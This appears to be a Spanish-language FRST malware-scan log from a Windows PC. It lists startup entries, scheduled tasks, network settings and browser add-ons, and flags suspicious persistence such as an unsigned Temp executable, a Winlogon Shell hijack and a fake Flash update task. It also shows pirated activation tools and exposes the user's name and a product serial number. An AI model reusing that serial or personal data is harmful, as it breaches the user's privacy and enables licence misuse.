(TeamViewer GmbH -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(Ulead Systems, Inc.) [Archivo no firmado] C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe

==================== Registro (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)

HKLM\...\Run: [IAAnotif] => C:\Program Files (x86)\Intel\Intel Matrix Storage Manager\iaanotif.exe [186904 2009-06-04] (Intel Corporation -> Intel Corporation)
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [8060960 2009-08-05] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [PLFSetI] => C:\Windows\PLFSetI.exe [200704 2009-12-01] () [Archivo no firmado]
HKLM\...\Run: [ODDPwr] => C:\Program Files\Acer\Optical Drive Power Management\ODDPwr.exe [221728 2009-09-04] (Acer Incorporated -> Acer Incorporated)
HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [159232 2009-09-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe [380928 2009-09-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe [358912 2009-09-02] (Microsoft Windows Hardware Compatibility Publisher -> Intel Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [1808168 2009-06-18] (Synaptics Incorporated -> Synaptics Incorporated)
HKLM-x32\...\Run: [LManager] => C:\Program Files (x86)\Launch Manager\LManager.exe [1094736 2009-11-01] (Dritek System Inc. -> Dritek System Inc.)
HKLM-x32\...\Run: [ISUSScheduler] => C:\Program Files (x86)\Common Files\InstallShield\UpdateService\issch.exe [81920 2005-02-16] (InstallShield Software Corporation) [Archivo no firmado]
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [54840 2007-05-08] (Hewlett-Packard Company -> Hewlett-Packard)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59240 2011-09-27] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2133728 2017-09-12] (Wondershare Technology Co.,Ltd -> Wondershare)
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Software Inc. -> Acresso Corporation)
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [rm] => C:\Users\MARCO AVILA\AppData\Local\Temp\~atmp\_8451.exe [3244032 2020-03-26] (Ggmyhirjho) [Archivo no firmado] <==== ATENCIÓN
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [24552064 2019-10-15] (Piriform Software Ltd -> Piriform Ltd)
HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Winlogon: [Shell] explorer.exe, "C:\ProgramData\ErrorResponder\errorResponder.exe" <==== ATENCIÓN
HKLM\Software\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{73FA19D0-2D75-11D2-995D-00C04F98BBC9}] -> 
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\80.0.3987.149\Installer\chrmstp.exe [2020-03-19] (Google LLC -> Google LLC)
HKLM\Software\...\Authentication\Credential Providers: [{F8A0B131-5F68-486c-8040-7E8FC3C85BB6}] -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDCREDPROV.DLL [2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Acer VCM.lnk [2009-12-01]
ShortcutTarget: Acer VCM.lnk -> C:\Program Files (x86)\Acer\Acer VCM\AcerVCM.exe (Ningún archivo)
Startup: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Samsung Auto Backup Real-Time Daemon.lnk [2011-02-20]
ShortcutTarget: Samsung Auto Backup Real-Time Daemon.lnk -> C:\Program Files (x86)\Clarus\Samsung Auto Backup\ISFRealTimeD.exe (Clarus, Inc.) [Archivo no firmado]
Startup: C:\Users\MARCO AVILA\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Samsung Auto Backup Scheduler.lnk [2011-02-20]
ShortcutTarget: Samsung Auto Backup Scheduler.lnk -> C:\Program Files (x86)\Clarus\Samsung Auto Backup\ISFTimerD.exe (Clarus, Inc.) [Archivo no firmado]
BootExecute: autocheck autochk * bootdelete
GroupPolicy: Restricción ? <==== ATENCIÓN

==================== Tareas programadas (Lista blanca) ============

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

Task: {004429EA-5244-4EBD-8904-9A0C64418CB1} - System32\Tasks\{E42A772A-328E-4927-BE90-5CCB2A81671D} => C:\Program Files (x86)\RAR Password Cracker\rpc.exe
Task: {044F4A48-321A-43AC-A9F6-F19F8D91B966} - System32\Tasks\Adobe Flash sdk Files Update up_2020326 => C:\Users\MARCO AVILA\AppData\Local\Temp\~atmp\_9D4F.exe [3279360 2020-03-26] (Rfz) [Archivo no firmado] <==== ATENCIÓN
Task: {0CE184F9-C9A3-4546-9EDC-E5C5536E1418} - System32\Tasks\{3677C5C1-371D-4C65-8D9F-49AA4F00395C} => C:\Users\MARCO AVILA\Desktop\MICROSOFT PROJECT 2007 (PORTABLE)\WINPROJ.EXE
Task: {0D42BDA2-8B8C-4481-A692-92E37D95D75F} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {12AFE1A3-4413-46CF-91D7-57ED665810D6} - System32\Tasks\{24DB5AEF-77D6-4D21-A60D-FC51D1DE0800} => F:\DERIVE\Setup.exe
Task: {13693098-6F67-419B-B05D-CFB3FE93C43E} - System32\Tasks\{42B0B5F8-0992-46F6-B000-D55521296966} => C:\Program Files (x86)\DVDVideoSoft\Free Studio\Free Video Dub\FreeVideoDub.exe [1430168 2012-02-22] (DVDVideoSoft Ltd. -> DVDVideoSoft Ltd.) [Archivo no firmado]
Task: {1D6C3AD0-820D-4CF9-BF65-62DD5CC0D487} - System32\Tasks\{CE0061C3-BB4E-4F9D-AE54-4C440ACD7DCB} => F:\soft\Setup.exe
Task: {2039C8D7-5F63-4C20-979C-C67488199856} - System32\Tasks\{A75F7D66-592A-4D97-ABFC-86C0BECA5C74} => F:\soft\Setup.exe
Task: {239BEED9-169D-4095-B05B-F49FF381B453} - System32\Tasks\{2B17A2B9-CF03-415D-BC43-221C4C331B14} => C:\Users\MARCO AVILA\Desktop\UVCDriver-V2.5-for web-x86&x64-20100611\setup.exe
Task: {28324B50-233C-4D3B-9B94-B5A7A3162929} - System32\Tasks\{DE9A6B33-FA22-416A-A54F-A84670A2D085} => F:\driver\setup.exe
Task: {2E8ED139-72E6-483B-B20C-453CEF07EAC4} - \cfozyfozh -> Ningún archivo <==== ATENCIÓN
Task: {33E26D4E-53A5-4732-9AB1-5C72A6706A0B} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [608384 2019-10-15] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {4692B3B5-1754-4087-8BB4-F28C35B8DB70} - System32\Tasks\{4DE22ECF-13B1-486E-A4BF-8E1A61B22195} => F:\DERIVE\Setup.exe
Task: {4C1B364A-AEB9-4F3A-82D7-9451A6296477} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [18458752 2019-10-15] (Piriform Software Ltd -> Piriform Ltd)
Task: {4FE45DF9-137F-4313-ADC2-C643B9F07A48} - System32\Tasks\{63606048-94AF-4BF5-8844-18B2029713AE} => F:\driver\setup.exe
Task: {58A086E0-42EF-44B5-BD5E-4845892442E1} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe
Task: {629B73C5-E911-4CC8-B4EE-1269D96C4357} - System32\Tasks\AutoKMSDaily => C:\Windows\AutoKMS.exe
Task: {65927409-4FCF-45C9-8D28-8617582F8DC1} - System32\Tasks\{37C356D6-A910-448F-B5DD-7BB89821D0AD} => C:\Users\MARCO AVILA\Desktop\MICROSOFT PROJECT 2007 (PORTABLE)\WINPROJ.EXE
Task: {674E4BF1-02A9-436F-A485-7B769400D288} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {69A5FF54-77C5-426F-ACF5-015F5A789300} - System32\Tasks\{C0B8A7A4-2234-4D94-ABDC-8D51C0DF69C0} => C:\Program Files (x86)\Common Files\DVDVideoSoft\FreeStudioManager.exe [6424120 2012-02-22] (DVDVideoSoft Ltd. -> DvdVideoSoft Ltd. ) [Archivo no firmado]
Task: {721A677F-BD8C-4516-AFF3-3E6E2F7092D6} - System32\Tasks\[email protected]\Office16ProPlus => wmic path OfficeSoftwareProtectionProduct where (ID="d450596f-894d-49e0-966a-fd39ed4c4c64") call Activate
Task: {74CABDCB-9BD1-4670-B1C3-D6D9B16E5E06} - System32\Tasks\{F0BF1A23-AAD0-476B-B0AA-DB333FC92FFE} => C:\Program Files (x86)\USB2.0 PC Camera\CamApp.exe
Task: {7E78E065-237E-4109-BA80-217925760F0B} - System32\Tasks\{362B582C-452B-4BCE-9FDA-E3F3F8988AD7} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{F3D5ECF7-7AE4-4B53-8A7E-1F850D6AE6B4}\setup.exe" -c -runfromtemp -l0x0009 -removeonly
Task: {8017E0F0-4623-4CAE-BBF8-A7FB06EA6C96} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate
Task: {8017E0F0-4623-4CAE-BBF8-A7FB06EA6C96} - System32\Tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater => Command(2): %windir%\system32\rundll32.exe -> invagent.dll,RunUpdate
Task: {8236BBBF-4E5C-4DC9-93BE-B7DDF95B8A52} - System32\Tasks\{1009BAC7-3A0A-4541-BD6F-681906513587} => C:\Users\MARCO AVILA\Desktop\Autocad 2011 (32bits)\Setup.exe
Task: {8247DF90-7C32-494A-B60B-9F24F1954183} - System32\Tasks\{1D9CB6C2-F9B3-41AE-B8EB-6EFB93E52C1A} => C:\Program Files (x86)\HTTPDebuggerPro\HTTPDebuggerUI.exe
Task: {8504F7E2-D1B2-4255-BDFC-71978BC3D2BD} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-12-27] (Google Inc -> Google Inc.)
Task: {8736786B-E568-46C9-8E25-B1FA90D746B9} - System32\Tasks\{2764DDF7-A8C2-4955-BB01-5162F65D6B11} => F:\DERIVE\Setup.exe
Task: {8B9CDFF2-ADD7-4844-9E21-432EE136C396} - System32\Tasks\{632ACBA7-5CBB-4A11-8140-A3E251857ACB} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Electronic Arts\Need for Speed Carbono\EAUninstall.exe"
Task: {8F9F0FAB-D1E7-494A-80BE-2F4B25FD6ACA} - System32\Tasks\{DFB5321F-790B-449D-A375-ED2396BB0BA7} => C:\Users\MARCO AVILA\Desktop\Free Video Dub 1.74.67_Portable\Free Video Dub.exe
Task: {90434769-8FF1-47DF-930F-CDC79DA03150} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(1): %windir%\system32\rundll32.exe -> aepdu.dll,AePduRunUpdate -nolegacy
Task: {90434769-8FF1-47DF-930F-CDC79DA03150} - System32\Tasks\Microsoft\Windows\Application Experience\Microsoft Compatibility Appraiser => Command(2): %windir%\system32\rundll32.exe -> appraiser.dll,DoScheduledTelemetryRun
Task: {9082DDA6-859B-4932-93AC-BF5642AB6B3F} - System32\Tasks\{0394875D-2637-469D-9971-0B2FC6300FA0} => F:\DERIVE\Setup.exe
Task: {9A07DFF4-A42D-4948-B3FA-A7C3A68E7E98} - System32\Tasks\{B04818A1-4C6F-4BD3-B98B-5C67A017F2F1} => C:\Users\MARCO AVILA\Desktop\Free Video Dub 1.74.67_Portable\Free Video Dub.exe
Task: {A595D2D3-1731-4800-A267-E134D77EE33D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [144200 2015-12-27] (Google Inc -> Google Inc.)
Task: {A764EF5F-64B9-462D-A1E2-4859F0E01865} - System32\Tasks\{F3C2F9CF-6BD4-4E8D-A408-E8C4ED283735} => C:\Windows\system32\pcalua.exe -a C:\Windows\unvise32qt.exe -c C:\Windows\system32\QuickTime\Uninstall.log
Task: {BA81CED1-BD06-47C7-9499-6FFEEEB126E2} - System32\Tasks\{7F1A3294-4CFB-49BB-B5A4-5B003C204FE8} => C:\Program Files (x86)\HTTPDebuggerPro\HTTPDebuggerUI.exe
Task: {BCBC6656-A8B4-4C55-ADE0-4685D48896C8} - System32\Tasks\{A29A3ABC-F9AF-40F0-BE92-C29D4288F38F} => C:\Program Files (x86)\TubeDigger\TubeDigger.exe
Task: {BD144ED7-700F-4835-9680-928B99A7387B} - System32\Tasks\{EB168395-2BF7-4FA0-A39B-4D3FC10D0E6E} => F:\driver\setup.exe
Task: {C044705F-5982-492D-8273-246A395D7060} - System32\Tasks\{43D3B180-FDF4-4F21-B348-8DC9469A320D} => C:\Program Files (x86)\Common Files\DVDVideoSoft\FreeStudioManager.exe [6424120 2012-02-22] (DVDVideoSoft Ltd. -> DvdVideoSoft Ltd. ) [Archivo no firmado]
Task: {C680F459-75EB-4FB7-AA17-7797EB0915E4} - System32\Tasks\{F0737E83-4EB2-4475-B6D0-3055061A38A1} => F:\DERIVE\Setup.exe
Task: {C8BF051C-D43A-4939-9FF4-D25C9BECFD83} - System32\Tasks\RealUpgradeLogonTaskS-1-5-21-1649130365-987012723-906343211-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe
Task: {DBB0A5E7-0BC0-4069-BA6A-C18F6DE2AB8F} - System32\Tasks\{1BBE0B68-556F-4A59-9423-95B718E85946} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\Nero\Nero ProductInstaller 4\SetupX.exe" -c REMOVESERIALNUMBER="9M03-01A1-PCX7-K31A-8A94-98PT-KT2E-522A"
Task: {E29389DD-8D0F-4557-BF1A-6B61736B639E} - System32\Tasks\RealUpgradeScheduledTaskS-1-5-21-1649130365-987012723-906343211-1000 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe
Task: {E96C7094-CDA4-4D64-9B97-EBEC24982707} - System32\Tasks\Microsoft\Windows Live\SOXE\Extractor Definitions Update Task => {3519154C-227E-47F3-9CC9-12C3F05817F1}
Task: {F5463463-DA4C-4222-898B-C5DBA5360B88} - System32\Tasks\{6A8747E5-3A68-441E-982D-533C6939C771} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Xilisoft\Video Converter Ultimate 6\Uninstall.exe"
Task: {F8891381-1E66-4481-8026-D3BB981AE07A} - System32\Tasks\{F96B9AC3-8FB4-42B5-9EF3-B8BCFA1FAC64} => C:\Program Files (x86)\Common Files\DVDVideoSoft\FreeStudioManager.exe [6424120 2012-02-22] (DVDVideoSoft Ltd. -> DvdVideoSoft Ltd. ) [Archivo no firmado]
Task: {FFC54FF7-C9D4-40A6-959F-E9D45F8C20B0} - System32\Tasks\AutoKMS => C:\Windows\AutoKMS.exe

(Si una entrada es incluida en el fixlist, el archivo de tarea (.job) será movido. El archivo que está siendo ejecutado por la tarea no será movido.)

Task: C:\Windows\Tasks\Adobe Flash sdk Files Update up_2020326.job => C:\Users\MARCOA~1\AppData\Local\Temp\~atmp\_9D4F.exe/check_update C:\Users\MARCO AVILA\AppData\Local\inetinfoserviceMARCO AVILA6This task detecct has update for sdk files.up <==== ATENCIÓN

==================== Internet (Lista blanca) ====================

(Si un elemento es incluido en el fixlist, y éste pertenece al registro, será eliminado o restaurado a su valor predeterminado.)

Winsock: Catalog5 07 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145280 2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5 08 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145280 2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 07 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171392 2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 08 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171392 2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
Hosts: Hay más de una entrada en Hosts. Consulte la sección Hosts de Addition.txt
Tcpip\Parameters: [DhcpNameServer] 10.0.196.141 189.198.222.137 200.77.146.137
Tcpip\..\Interfaces\{4CA491EE-4CD0-45CF-BC52-51C254C4A7B1}: [NameServer] 8.8.8.8 8.8.4.4
Tcpip\..\Interfaces\{7AD1033E-FE1D-4D56-A9E9-134D6AEF16DB}: [DhcpNameServer] 10.0.196.141 200.77.146.137 200.52.170.150
Tcpip\..\Interfaces\{86463265-C657-4234-94AF-E401DE4093E0}: [DhcpNameServer] 10.0.196.141 189.198.222.137 200.77.146.137

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = 
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
SearchScopes: HKLM -> DefaultScope no se encuentra el valor
BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2020-01-20] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO: Sin Nombre -> {13D67BB7-DB5F-48AA-884D-7A5D94168509} -> Ningún archivo
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_201\bin\ssv.dll [2019-03-01] (Oracle America, Inc. -> Oracle Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office16\URLREDIR.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office16\GROOVEEX.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_201\bin\jp2ssv.dll [2019-03-01] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2020-01-20] (Tonec Inc. -> Internet Download Manager, Tonec Inc.)
BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} -> C:\Program Files (x86)\Nuance\PDF Professional 7\Bin\PlusIEContextMenu.dll [2010-07-16] (Zeon Corporation -> Zeon Corporation)
BHO-x32: Aplicación auxiliar de inicio de sesión de Windows Live ID -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2011-03-28] (Microsoft Corporation -> Microsoft Corp.)
BHO-x32: IEInspector Browser Helper -> {9B43B7B1-BF56-4708-81D2-332D708B0DD9} -> C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\IEInspectorBHO.dll [2017-04-12] (QingHai -> IEInspector Software)
BHO-x32: Windows Live Messenger Companion Helper -> {9FDDE16B-836F-4806-AB1F-1455CBEFF289} -> C:\Program Files (x86)\Windows Live\Companion\companioncore.dll [2012-03-08] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office16\URLREDIR.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
BHO-x32: ZeonIEEventHelper Class -> {DA986D7D-CCAF-47B2-84FE-BFA1549BEBF9} -> C:\Program Files (x86)\Nuance\PDF Professional 7\Bin\ZeonIEFavClient.dll [2011-02-16] (Zeon Corporation -> Zeon Corporation)
Toolbar: HKLM-x32 - DocuCom PDF - {E3286BF1-E654-42FF-B4A6-5E111731DF6B} - C:\Program Files (x86)\Nuance\PDF Professional 7\Bin\ZeonIEFavClient.dll [2011-02-16] (Zeon Corporation -> Zeon Corporation)
Handler-x32: mso-minsb.16 - {3459B272-CC19-4448-86C9-DDC3B4B2FAD3} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2018-04-10] (Microsoft Corporation -> Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\Office16\MSOSB.DLL [2018-04-10] (Microsoft Corporation -> Microsoft Corporation)
Handler: WSISAllmytubechrome - Sin valor CLSID

FireFox:
========
FF DefaultProfile: ds5ojdhh.default-1492367854850
FF ProfilePath: C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\24bww9ll.default-release [2020-03-27]
FF Extension: (Free Download Manager extension) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Extensions\{ec8030f7-c20a-464f-9b0e-13a3a9e97384}\[email protected] [2017-08-11] [Heredado]
FF ProfilePath: C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850 [2020-03-27]
FF DownloadDir: C:\Users\MARCO AVILA\Desktop
FF Homepage: Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850 -> hxxps://www.google.com.mx/
FF NewTab: Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850 -> hxxps://espanol.yahoo.com/yhs/web?hspart=lvs&hsimp=yhs-awc&type=lvs__webcompa__1_0__ya__hp_WCYID10315__171019__yaff
FF Notifications: Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850 -> hxxps://crackingportal.com; hxxps://notifications.models.xxx; hxxps://www.interjet.com
FF Extension: (English United States Dictionary) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\@unitedstatesenglishdictionary.xpi [2020-02-02]
FF Extension: (ZenMate Free VPN - Mejor VPN) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\[email protected] [2020-03-11]
FF Extension: (English (US) Language Pack) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\[email protected] [2020-03-12]
FF Extension: (FlashGot) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}.xpi [2017-08-22] [Heredado]
FF Extension: (Bulk Media Downloader) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\{72b2e02b-3a71-4895-886c-fd12ebe36ba3}.xpi [2017-12-09]
FF Extension: (ReminderFox) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\{ada4b710-8346-4b82-8199-5de2b400a6ae}.xpi [2017-06-26] [Heredado]
FF Extension: (Video DownloadHelper) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2019-07-07]
FF Extension: (HTTP Header Live) - C:\Users\MARCO AVILA\AppData\Roaming\Mozilla\Firefox\Profiles\ds5ojdhh.default-1492367854850\Extensions\{ed102056-8b4f-43a9-99cd-6d1b25abe87e}.xpi [2019-08-20]
FF HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi
FF Extension: (IDM Integration Module) - C:\Program Files (x86)\Internet Download Manager\idmmzcc3.xpi [2020-01-21]
FF HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\SeaMonkey\Extensions: [[email protected]] - C:\Users\MARCO AVILA\AppData\Roaming\IDM\idmmzcc5
FF Extension: (IDM CC) - C:\Users\MARCO AVILA\AppData\Roaming\IDM\idmmzcc5 [2020-01-24] [Heredado] [no firmado]
FF HKU\S-1-5-21-1649130365-987012723-906343211-1000\...\SeaMonkey\Extensions: [[email protected]] - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi
FF Extension: (IDM integration) - C:\Program Files (x86)\Internet Download Manager\idmmzcc2.xpi [2017-12-20] [Heredado]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_255.dll [2019-09-23] (Adobe Inc. -> )
FF Plugin: @java.com/DTPlugin,version=11.201.2 -> C:\Program Files\Java\jre1.8.0_201\bin\dtplugin\npDeployJava1.dll [2019-03-01] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.201.2 -> C:\Program Files\Java\jre1.8.0_201\bin\plugin2\npjp2.dll [2019-03-01] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_255.dll [2019-09-23] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1202122.dll [2013-04-03] (Adobe Systems, Inc.) [Archivo no firmado]
FF Plugin-x32: @cambridgesoft.com/Chem3D,version=12.0 -> C:\Program Files (x86)\CambridgeSoft\ChemOffice2010\Chem3D\npChem3DPlugin.dll [2009-05-26] (CambridgeSoft Corporation -> CambridgeSoft Corp.)
FF Plugin-x32: @cambridgesoft.com/ChemDraw,version=12.0 -> C:\Program Files (x86)\CambridgeSoft\ChemOffice2010\ChemDraw\npcdp32.dll [2009-05-26] (CambridgeSoft Corporation -> CambridgeSoft Corp.)
FF Plugin-x32: @ieinspector.com/ha_plugin -> C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\firefox\Components [2018-12-06] ()
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] (Microsoft Corporation ->  Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation -> Microsoft Corporation)
